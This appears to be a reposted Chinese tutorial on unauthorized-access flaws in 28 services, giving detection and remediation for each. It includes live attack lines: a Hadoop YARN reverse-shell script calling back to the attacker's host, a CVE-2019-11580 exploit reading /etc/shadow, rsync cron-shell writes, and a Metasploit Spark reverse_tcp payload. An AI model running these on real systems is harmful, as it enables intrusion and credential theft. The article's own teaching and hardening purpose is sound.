二十八种未授权访问漏洞合集(暂时最全)
目錄
0x01 未授權漏洞預覽
0x02 Active MQ 未授權訪問
0x03 Atlassian Crowd 未授權訪問
0x04 CouchDB 未授權訪問
0x05 Docker 未授權訪問
0x06 Dubbo 未授權訪問
0x07 Druid 未授權訪問
0x08 Elasticsearch 未授權訪問
0x09 FTP 未授權訪問
0x10 HadoopYARN 未授權訪問
0x11 JBoss 未授權訪問
0x12 Jenkins 未授權訪問
0x13 Jupyter Notebook 未授權訪問
0x14 Kibana 未授權訪問
0x15 Kubernetes Api Server 未授權
0x16 LDAP 未授權訪問
0x17 MongoDB 未授權訪問
0x18 Memcached 未授權訪問
0x19 NFS 未授權訪問
0x20 Rsync 未授權訪問
0x21 Redis 未授權訪問
0x22 RabbitMQ 未授權訪問
0x23 Solr 未授權訪問
0x24 SpringBoot Actuator 未授權訪問
0x25 Spark 未授權訪問
0x26 VNC 未授權訪問
0x27 Weblogic 未授權訪問
0x28 ZooKeeper 未授權訪問
0x29 Zabbix 未授權訪問
參考文章
這篇文章主要收集一些常見的未授權訪問漏洞。未授權訪問漏洞可以理解為需要安全配置或權限認證的地址、授權頁面存在缺陷導致其他用戶可以直接訪問從而引發重要權限可被操作、數據庫或網站目錄等敏感信息泄露。
0x01 未授權漏洞預覽
Active MQ 未授權訪問 Atlassian Crowd 未授權訪問 CouchDB 未授權訪問 Docker 未授權訪問 Dubbo 未授權訪問 Druid 未授權訪問 Elasticsearch 未授權訪問 FTP 未授權訪問 Hadoop 未授權訪問 JBoss 未授權訪問 Jenkins 未授權訪問 Jupyter Notebook 未授權訪問 Kibana 未授權訪問 Kubernetes Api Server 未授權訪問 LDAP 未授權訪問 MongoDB 未授權訪問 Memcached 未授權訪問 NFS 未授權訪問 Rsync 未授權訪問 Redis 未授權訪問 RabbitMQ 未授權訪問 Solr 未授權訪問 Spring Boot Actuator 未授權訪問 Spark 未授權訪問 VNC 未授權訪問 Weblogic 未授權訪問 ZooKeeper 未授權訪問 Zabbix 未授權訪問0x02 Active MQ 未授權訪問
1. 漏洞簡介
ActiveMQ 是一款流行的開源消息服務器。默認情況下,ActiveMQ 服務是沒有配置安全參數。惡意人員可以利用默認配置弱點發動遠程命令執行攻擊,獲取服務器權限,從而導致數據泄露。
2.漏洞檢測
默認端口:8161
默認密碼:admin/admin
3.漏洞修復
-
針對未授權訪問,可修改conf/jetty.xml文件,bean id為securityConstraint下的authenticate修改值為true,重啟服務即可。
-
針對弱口令,可修改conf/jetty.xml文件,bean id 為securityLoginService下的conf值獲取用戶properties,修改用戶名密碼,重啟服務即可。
參考文章?https://www.ouyangxiaoze.com/2020/08/631.html
0x03 Atlassian Crowd 未授權訪問
1.漏洞簡介
Atlassian Crowd是一套基于Web的單點登錄系統。該系統為多用戶、網絡應用程序和目錄服務器提供驗證、授權等功能。Atlassian Crowd Data Center是Crowd的集群部署版。
Atlassian Crowd和Crowd Data Center在其某些發行版本中錯誤地啟用了pdkinstall開發插件,使其存在安全漏洞。攻擊者利用該漏洞可在未授權訪問的情況下對Atlassian Crowd和Crowd Data Center安裝任意的惡意插件,執行任意代碼/命令,從而獲得服務器權限。
2.漏洞檢測
漏洞利用腳本github地址:https://github.com/jas502n/CVE-2019-11580
git clone https://github.com/jas502n/CVE-2019-11580 cd CVE-2019-11580/ python CVE-2019-11580.py http://192.168.18.138:8095 curl http://192.168.18.138:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow3.漏洞修復
-
設置訪問/crowd/admin/uploadplugin.action的源ip。
-
升級最新版本(3.5.0以上)。
0x04 CouchDB 未授權訪問
1.漏洞簡介
Apache CouchDB 是一個開源數據庫,默認會在5984端口開放Restful的API接口,如果使用SSL的話就會監聽在6984端口,用于數據庫的管理功能。其HTTP Server默認開啟時沒有進行驗證,而且綁定在0.0.0.0,所有用戶均可通過API訪問導致未授權訪問。
在官方配置文檔中對HTTP Server的配置有WWW-Authenticate:Set this option to trigger basic-auth popup on unauthorized requests,但是很多用戶都沒有這么配置,導致漏洞產生。
2.漏洞檢測
使用vulhub搭建漏洞環境用于測試演示
未授權訪問測試命令
curl 192.168.126.130:5984 curl 192.168.126.130:5984/_config3.漏洞修復
-
指定CouchDB綁定的IP (需要重啟CouchDB才能生效)在 /etc/couchdb/local.ini 文件中找到 “bind_address = 0.0.0.0” ,把 0.0.0.0 修改為 127.0.0.1 ,然后保存。?注:修改后只有本機才能訪問CouchDB。
-
設置訪問密碼(需要重啟CouchDB才能生效)在 /etc/couchdb/local.ini 中找到“[admins]”字段配置密碼。
-
設置WWW-Authenticate,強制認證。
0x05 Docker 未授權訪問
1.漏洞簡介
該未授權訪問漏洞是因為Docker API可以執行Docker命令,該接口是目的是取代Docker命令界面,通過URL操作Docker。
-
Docker API 未授權訪問漏洞分析和利用
2.漏洞檢測
使用vulhub搭建漏洞環境用于測試演示
cd /vulhub/docker/unauthorized-rce docker-compose build docker-compose up -d直接輸入地址?http://your-ip:2375/version?;若能訪問,證明存在未授權訪問漏洞。
3.漏洞修復
-
對2375端口做網絡訪問控制,如ACL控制,或者訪問規則;
-
修改docker swarm的認證方式,使用TLS認證;
0x06 Dubbo 未授權訪問
1.漏洞簡介
Dubbo是阿里巴巴公司開源的一個高性能優秀的 服務框架,使得應用可通過高性能的 RPC 實現服務的輸 出和輸入功能,可以和 Spring框架無縫集成。dubbo 因配置不當導致未授權訪問漏洞。
2.漏洞檢測
連接進入dubbo 服務,進行操作
telent IP port3.漏洞修復
-
配置dubbo認證;
-
設置防火墻策略,限定IP訪問;
0x07 Druid 未授權訪問
1.漏洞簡介
Druid是阿里巴巴數據庫出品的,為監控而生的數據庫連接池,并且Druid提供的監控功能,監控SQL的執行時間、監控Web URI的請求、Session監控,首先Druid是不存在什么漏洞的。但當開發者配置不當時就可能造成未授權訪問。
2.漏洞檢測
直接在網站的url中后加上:
/druid/index.html /druid/websession.html /druid/datasource.html /druid/sql.html /druid/spring.html如果可以無需登錄,即可登錄到Druid監控界面,則說明該網站存在Druid未授權訪問漏洞
3.漏洞修復
-
配置訪問賬號密碼;
-
禁止對外網開放訪問;
0x08 Elasticsearch 未授權訪問
1.漏洞簡介
Elasticsearch是一款java編寫的企業級搜索服務。越來越多的公司使用ELK作為日志分析,啟動此服務默認會開放9200端口或者9300端口,可被非法操作數據。
2.漏洞檢測
未授權訪問測試命令
http://localhost:9200/_cat/indices http://localhost:9200/_river/_search #查看數據庫敏感信息 http://localhost:9200/_nodes #查看節點數據3.漏洞修復
-
訪問控制策略,限制IP訪問,綁定固定IP;
-
在config/elasticsearch.yml中為9200端口設置認證等;
0x09 FTP 未授權訪問
1.漏洞簡介
FTP 弱口令或匿名登錄漏洞,一般指使用 FTP 的用戶啟用了匿名登錄功能,或系統口令的長度太短、復雜度不夠、僅包含數字、或僅包含字母等,容易被黑客攻擊,發生惡意文件上傳或更嚴重的入侵行為。
2.漏洞檢測
直接訪問ftp路徑:ftp://ip:port/
3.漏洞修復
-
禁止匿名登錄;
-
配置強密碼,密碼長度建議八位以上,且密碼應包括大小寫字母、特殊字符、數字混合體;
0x10 HadoopYARN 未授權訪問
1.漏洞簡介
Hadoop是一款由Apache基金會推出的分布式系統框架,它通過著名的MapReduce算法進行分布式處理,Yarn是Hadoop集群的資源管理系統。
此次事件主要因HadoopYARN資源管理系統配置不當,導致可以未經授權進行訪問,從而被攻擊者惡意利用。攻擊者無需認證即可通過RESTAPI部署任務來執行任意指令,最終完全控制服務器。
2.漏洞檢測
使用vulhub搭建漏洞演示環境
cd /vulhub/hadoop/unauthorized-yarn docker-compose up -d環境啟動后,沒有配置身份認證,可以未授權訪問到Hadoop YARN ResourceManager WebUI頁面。
http://192.168.126.130:8088/ http://192.168.126.130:8088/cluster利用該漏洞,可以進一步getshell??
腳本源碼如下:rce.py?
#!/usr/bin/env python import requests target = 'http://192.168.126.130:8088/' # 設置目標主機的ip地址 lhost = '192.168.126.128' # 設置你攻擊主機的監聽ip地址,并且監聽端口為9999 url = target + 'ws/v1/cluster/apps/new-application' resp = requests.post(url) app_id = resp.json()['application-id'] url = target + 'ws/v1/cluster/apps' data = {'application-id': app_id,'application-name': 'get-shell','am-container-spec': {'commands': {'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,},},'application-type': 'YARN', } requests.post(url, json=data)3.漏洞修復
-
升級Hadoop到2.x版本以上,并啟用Kerberos認證功能,禁止匿名訪問;
-
設置“安全組”訪問控制策略,將 Hadoop 默認開放的多個端口對公網全部禁止或限制可信任的 IP 地址才能訪問包括 50070 以及 WebUI 等相關端口;
-
如無必要,關閉 Hadoop Web 管理頁面;
0x11 JBoss 未授權訪問
1.漏洞簡介
漏洞簡述JBOSS 企業應用平臺EAP是 J2EE 應用的中間件平臺。默認情況下訪問?http://ip:8080/jmx-console就可以瀏覽 Jboss 的部署管理的信息不需要輸入用戶名和密碼可以直接部署上傳木馬有安全隱患。
2.漏洞檢測
直接訪問?http://ip:port/?看是否能進入 jmx-console 和 web-console 頁面
http://ip:8080/ http://ip:8080/jmx-console/ http://ip:8080/jbossws/3.漏洞修復
-
添加 JMX 控制頁面身份認證;
-
進行JMX Console 安全配置;
-
關閉jmx-console和web-console;
0x12 Jenkins 未授權訪問
1.漏洞簡介
默認情況下Jenkins面板中用戶可以選擇執行腳本界面來操作一些系統層命令,攻擊者可通過未授權訪問漏洞或者暴力破解用戶密碼等進腳本執行界面從而獲取服務器權限。
2.漏洞檢測
直接通過url輸入以下地址,若能訪問,證明存在未授權訪問漏洞。
http://<target>:8080/manage http://<target>:8080/script未授權訪問?http://<target>:8080/script?可以執行系統命令
# 命令格式 println "whoami".execute().text3.漏洞修復
-
對后臺控制頁面做登錄驗證限制;
-
升級Jenkins至新版本;
-
禁止把Jenkins直接暴露在公網;
0x13 Jupyter Notebook 未授權訪問
1.漏洞簡介
Jupyter Notebook(此前被稱為 IPython notebook)是一個交互式筆記本,支持運行 40 多種編程語言。如果管理員未為Jupyter Notebook配置密碼,將導致未授權訪問漏洞,游客可在其中創建一個console并執行任意Python代碼和命令。
2.漏洞檢測
使用vulhub搭建漏洞演示環境
cd /vulhub/jupyter/notebook-rce docker-compose up -d運行后,訪問http://your-ip:8888將看到Jupyter Notebook的Web管理界面,并沒有要求填寫密碼。
選擇 new -> terminal 即可創建一個控制臺:?
直接執行任意命令:
3.漏洞修復
-
開啟身份驗證,防止未經授權用戶訪問;
-
訪問控制策略,限制IP訪問,綁定固定IP;
0x14 Kibana 未授權訪問
1.漏洞簡介
Kibana如果允許外網訪問,沒有做安全的登錄認證,也會被外部隨意訪問查看所有的數據,造成少數據泄露。
2.漏洞檢測
直接訪問kibana的頁面
http://192.168.126.130:5601/ https://192.168.126.130/app/kibana# http://192.168.126.130:5601/app/kibana#/無需賬號密碼可以登錄進入界面?
3.漏洞修復
-
設置kibana監聽本地地址,并設置ElasticSearch登錄的賬號和密碼;
-
設置防火墻策略,限定IP訪問服務;
0x15 Kubernetes Api Server 未授權
1.漏洞簡介
Kubernetes 的服務在正常啟動后會開啟兩個端口:Localhost Port (默認8080)、Secure Port (默認6443)。這兩個端口都是提供 Api Server 服務的,一個可以直接通過 Web 訪問,另一個可以通過 kubectl 客戶端進行調用。如果運維人員沒有合理的配置驗證和權限,那么攻擊者就可以通過這兩個接口去獲取容器的權限。
2.漏洞檢測
使用nmap尋找相關的端口和服務,直接訪問脆弱的服務
端口:8080?http://10.10.4.89:8080/
端口:8080:api dashboard:http://10.10.4.89:8080/ui?
端口:10250端口是kubelet API的HTTPS端口,通過路徑/pods獲取環境變量、運行的容器信息、命名空間等信息。?
3.漏洞修復
-
進行授權認證;
-
使用Service Account令牌;
-
設置防火墻策略,限定IP訪問服務;
0x16 LDAP 未授權訪問
1.漏洞簡介
LDAP中文全稱為:輕型目錄訪問協議(Lightweight Directory Access Protocol),默認使用389, LDAP 底層一般使用 TCP 或 UDP 作為傳輸協議。目錄服務是一個特殊的數據庫,是一種以樹狀結構的目錄數據庫為基礎。未對LDAP的訪問進行密碼驗證,導致未授權訪問。
2.漏洞檢測
使用nmap尋找到相關的LDAP服務器,可以使用ldapbrowser直接連接,獲取目錄內容。
3.漏洞修復
-
修改ldap的acl,禁止匿名訪問。
-
根據業務設置ldap訪問白名單或黑名單;
0x17 MongoDB 未授權訪問
1.漏洞簡介
開啟MongoDB服務時不添加任何參數時,默認是沒有權限驗證的,登錄的用戶可以通過默認端口無需密碼對數據庫任意操作(增、刪、改、查高危動作)而且可以遠程訪問數據庫。
造成未授權訪問的根本原因就在于啟動 Mongodb 的時候未設置 –auth 也很少會有人會給數據庫添加上賬號密碼(默認空口令),使用默認空口令這將導致惡意攻擊者無需進行賬號認證就可以登陸到數據服務器。
2.漏洞檢測
安裝mongodb,然后連接到服務。
yum install mongodb mongo --host 10.2.20.34 --port 270173.漏洞修復
-
限制綁定IP,啟動時加入參數--bind_ip 127.0.0.1或在/etc/mongodb.conf文件中添加以下內容:bind_ip = 127.0.0.1;
-
在admin.system.users中添加用戶,啟動認證;
-
設置防火墻策略,限定 IP 訪問服務;
-
禁用HTTP和REST端口,修改配置文件或在啟動的時候選擇參數nohttpinterface=false;
0x18 Memcached 未授權訪問
1.漏洞簡介
Memcached 端口對外開放并且沒有配置認證選項,未授權用戶可直接獲取數據庫中所有信息,造成嚴重的信息泄露。
2.漏洞檢測
無需用戶名密碼,可以直接連接memcache 服務的11211端口
telnet 10.10.4.89 11211 # 或者 nc -vv 11211使用了 stats 命令來輸出 Memcached 服務信息
3.漏洞修復
-
修改綁定的IP、端口和指定訪問者IP;
-
設置防火墻策略;
-
禁止暴露在公網;
-
配置memcached監聽本地回環地址?127.0.0.1;
0x19 NFS 未授權訪問
1.漏洞簡介
Network File System(NFS),是由SUN公司研制的UNIX表示層協議(pressentation layer protocol),能使使用者訪問網絡上別處的文件就像在使用自己的計算機一樣。服務器在啟用nfs服務以后,由于nfs服務未限制對外訪問,導致共享目錄泄漏。
2.漏洞檢測
#安裝nfs客戶端 apt install nfs-common #查看nfs服務器上的共享目錄 showmount -e 192.168.126.130 #掛載相應共享目錄到本地 mount -t nfs 192.168.126.130:/grdata /mnt #卸載目錄 umount /mnt3.漏洞修復
-
利用iptables限制端口2049和20048端口的訪問,禁止外部訪問;
-
設置/etc/exports,對訪問進行控制;
0x20 Rsync 未授權訪問
1.漏洞簡介
rsync是Linux/Unix下的一個遠程數據同步工具,可通過LAN/WAN快速同步多臺主機間的文件和目錄,默認運行在873端口。由于配置不當,導致任何人可未授權訪問rsync,上傳本地文件,下載服務器文件。
2.漏洞檢測
使用vulhub搭建漏洞演示環境
cd /vulhub/rsync/common docker-compose build docker-compose up -d使用Rsync命令即可進行檢測。
rsync rsync://192.168.126.130:873/ rsync rsync://192.168.126.130:873/src利用rsync下載任意文件
rsync rsync://192.168.126.130:873/src/etc/passwd ./或者寫入任意文件?
rsync -av shell rsync://192.168.126.130:873/src/etc/cron.d/shell3.漏洞修復
-
隱藏 module 信息:修改配置文件 list =false。
-
權限控制:不需要寫入權限的 module 的設置為只讀 Read only = true;
-
網絡訪問控制:使用安全組策略或白名單限制,只允許必要訪問的主機訪問;
-
賬戶認證:只允許指定的用戶利用指定的密碼使用 rsync 服務;
-
數據加密傳輸:Rsync 默認沒有直接支持加密傳輸,如果需要 Rsync 同步重要性很高的數據,可以使用 ssh;
參考文章:https://www.freebuf.com/column/202771.html
0x21 Redis 未授權訪問
1.漏洞簡介
redis是一個數據庫,默認端口是6379,redis默認是沒有密碼驗證的,可以免密碼登錄操作,攻擊者可以通過操作redis進一步控制服務器。
Redis未授權訪問在4.x/5.0.5以前版本下,可以使用master/slave模式加載遠程模塊,通過動態鏈接庫的方式執行任意命令。
2.漏洞檢測
kali安裝redis-cli遠程連接工具
wget http://download.redis.io/redis-stable.tar.gz tar -zxvf redis-stable.tar.gz cd redis-stable make cp src/redis-cli /usr/bin/ redis-cli -h使用redis-cli命令直接遠程免密登錄redis主機
redis-cli -h 目標主機IP3.漏洞修復
-
禁止使用root權限啟動redis服務;
-
對redis訪問啟動密碼認證;
-
添加IP訪問限制,并更改默認6379端口;
0x22 RabbitMQ 未授權訪問
1.漏洞簡介
RabbitMQ是目前非常熱門的一款消息中間件,基于AMQP協議的,可以在發布者和使用者之間交換異步消息。消息可以是人類可讀的JSON,簡單字符串或可以轉換為JSON字符串的值列表。
2.漏洞檢測
默認賬號密碼都是guest
http://10.10.4.89:15672 http://10.10.4.89:25672/ http://10.10.4.89:15692/3.漏洞修復
-
修改為強密碼,刪除默認的賬號guest;
-
禁止對外網開放,僅限于內部訪問;
0x23 Solr 未授權訪問
1.漏洞簡介
Solr是一個高性能,采用Java開發,基于Lucene的全文搜索服務器。solr的管理界面通常包含如下信息:solr的配置信息(包括路徑,用戶名,系統版本信息),數據庫的配置信息(地址,用戶名,密碼),數據庫搜索數據等。solr未授權訪問的危害很大,輕則可查詢所有數據庫信息,重則可讀取系統任意文件,甚至getshell。
2.漏洞檢測
敏感目錄掃描時加上一條 /solr/admin
http://xx.xx.com/solr/admin https://xx.xx.com/solr/admin3.漏洞修復
-
配置solr訪問控制權限;
-
禁止將solr暴露在公網;
0x24 SpringBoot Actuator 未授權訪問
1.漏洞簡介
Actuator 是 springboot 提供的用來對應用系統進行自省和監控的功能模塊,借助于 Actuator 開發者可以很方便地對應用系統某些監控指標進行查看、統計等。在 Actuator 啟用的情況下,如果沒有做好相關權限控制,非法用戶可通過訪問默認的執行器端點(endpoints)來獲取應用系統中的監控信息,從而導致信息泄露甚至服務器被接管的事件發生。
2.漏洞檢測
直接訪問相關路徑:
http://10.2.20.48/autoconfig| get | /autoconfig | 提供了一份自動配置報告,記錄哪些自動配置條件通過了,哪些沒通過 |
| get | /configprops | 描述配置屬性(包含默認值)如何注入 Bean |
| get | /beans | 描述應用程序上下文里全部的 Bean,以及它們的關系 |
| get | /dump | 獲取線程活動的快照 |
| get | /env | 獲取全部環境屬性 |
| get | /env/{name} | 根據名稱獲取特定的環境屬性值 |
| get | /health | 報告應用程序的健康指標,這些值由 HealthIndicator 的實現類提供 |
| get | /info | 獲取應用程序的定制信息,這些信息由 info 打頭的屬性提供 |
| get | /mappings | 描述全部的 URI 路徑,以及它們和控制器(包含 Actuator 端點)的映射關系 |
| get | /metrics | 報告各種應用程序度量信息,比如內存用量和 HTTP 請求計數 |
| get | /metrics/{name} | 報告指定名稱的應用程序度量值 |
| post | /shutdown | 關閉應用程序,要求 endpoints.shutdown.enabled 設置為 true(默認為 false) |
| get | /trace | 提供基本的 HTTP 請求跟蹤信息(時間戳、HTTP 頭等) |
3.漏洞修復
-
禁用/env接口;
-
升級到SpringBoot Actuator 2.0;
-
禁止對外開放;
0x25 Spark 未授權訪問
1.漏洞簡介
Apache Spark是一款集群計算系統,其支持用戶向管理節點提交應用,并分發給集群執行。如果管理節點未啟動訪問控制,攻擊者可以在集群中執行任意代碼。該漏洞的本質是未授權用戶可以向Master節點提交一個應用,Master節點會分發給Slave節點執行應用。如果應用中包含惡意代碼,會導致任意代碼執行,威脅Spark集群整體的安全性。
2.漏洞檢測
nmap掃描出如下端口開放,則很有可能存在漏洞
6066/tcp open http Jetty 9.3.z-SNAPSHOT 8081/tcp open http Jetty 9.3.z-SNAPSHOT 8082/tcp open http Jetty 9.3.z-SNAPSHOT使用msf工具getshell
msf5>use exploit/linux/http/spark_unauth_rce msf5>set payload java/meterpreter/reverse_tcp msf5>set rhost 192.168.100.2 msf5>set rport 6066 msf5>set lhost 192.168.100.1 msf5>set lport 4444 msf5>set srvhost 192.168.100.1 msf5>set srvport 8080 msf5>exploit3.漏洞修復
-
對外關閉敏感端口;
-
配置用戶權限認證;
參考文章:https://www.cnblogs.com/KevinGeorge/p/10399844.html
0x26 VNC 未授權訪問
1.漏洞簡介
VNC 是虛擬網絡控制臺Virtual Network Console的英文縮寫。它是一款優秀的遠程控制工具軟件由美國電話電報公司AT&T的歐洲研究實驗室開發。VNC是基于 UNXI 和 Linux 的免費開源軟件由 VNC Server 和 VNC Viewer 兩部分組成。
VNC 默認端口號為 5900、5901。VNC 未授權訪問漏洞如被利用可能造成惡意用戶直接控制受控主機危害相當嚴重。
2.漏洞檢測
使用 metasploit 進行批量檢測,使用檢測模塊?
auxiliary/scanner/vnc/vnx_none_auth在kali上直接使用vncviewer命令連接主機。
vncviewer ip3.漏洞修復
-
配置 VNC 客戶端登錄口令認證并配置符合密碼強度要求的密碼;
-
以最小權限的普通用戶身份運行操作系統;
0x27 Weblogic 未授權訪問
1.漏洞簡介
Weblogic是Oracle公司推出的J2EE應用服務器,CVE-2020-14882允許未授權的用戶繞過管理控制臺的權限驗證訪問后臺,CVE-2020-14883允許后臺任意用戶通過HTTP協議執行任意命令。使用這兩個漏洞組成的利用鏈,可通過一個GET請求在遠程Weblogic服務器上以未授權的任意用戶身份執行命令。
2.漏洞檢測
使用vulhub搭建漏洞演示環境
cd vulhub/weblogic/CVE-2020-14882 sudo docker-compose up -d攻擊者可以構造特殊請求的URL,即可未授權訪問到管理后臺頁面:?
遠程攻擊者可以構造特殊的HTTP請求,在未經身份驗證的情況下接管 WebLogic Server Console ,并在 WebLogic Server Console 執行任意代碼。
-
weblogic 權限繞過命令執行漏洞復現
3.漏洞修復
-
下載補丁程序并安裝更新;
0x28 ZooKeeper 未授權訪問
1.漏洞簡介
ZooKeeper 是一個分布式的開放源碼的分布式應用程序協調服務,ZooKeeper 默認開啟在 2181 端口在未進行任何訪問控制的情況下攻擊者可通過執行 envi 命令獲得系統大量的敏感信息包括系統名稱Java 環境,任意用戶在網絡可達的情況下進行為未授權訪問并讀取數據甚至 kill 服務。
2.漏洞檢測
stat:列出關于性能和連接的客戶端的統計信息。
echo stat |ncat 127.0.0.1 2181ruok:測試服務器是否運行在非錯誤狀態。
echo ruok |ncat 127.0.0.1 2181dump:列出未完成的會話和臨時節點。
echo dump |ncat 127.0.0.1 21813.漏洞修復
-
為ZooKeeper配置相應的訪問權限;
-
設置防火墻策略;
-
禁止把Zookeeper直接暴露在公網;
0x29 Zabbix 未授權訪問
1.漏洞簡介
zabbix是一款服務器監控軟件,默認服務開放端口為10051,其由server、agent、web等模塊組成,其中web模塊由PHP編寫,用來顯示數據庫中的結果。
2.漏洞檢測
無需賬戶密碼直接訪問zabbix頁面
3.漏洞修復
-
設置zabbix的復雜口令,不要用默認口令或弱口令,禁用guest登錄功能;
-
zabbix的server和agent都不要以root啟動,不要設置AllowRoot=1;
-
禁止agent執行system.run,不要設置EnableRemoteCommands=1;
參考文章
-
https://www.it610.com/article/1303971168365088768.htm
-
https://xz.aliyun.com/t/6103#toc-1
-
https://www.yuque.com/cheng-4ueio/tow7i5/wrbzgy
-
https://www.cnblogs.com/xiaozi/p/13369596.html
總結
以上是生活随笔為你收集整理的二十八种未授权访问漏洞合集(暂时最全)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: LeetCode119.杨辉三角II
- 下一篇: net::ERR_ABORTED ,引入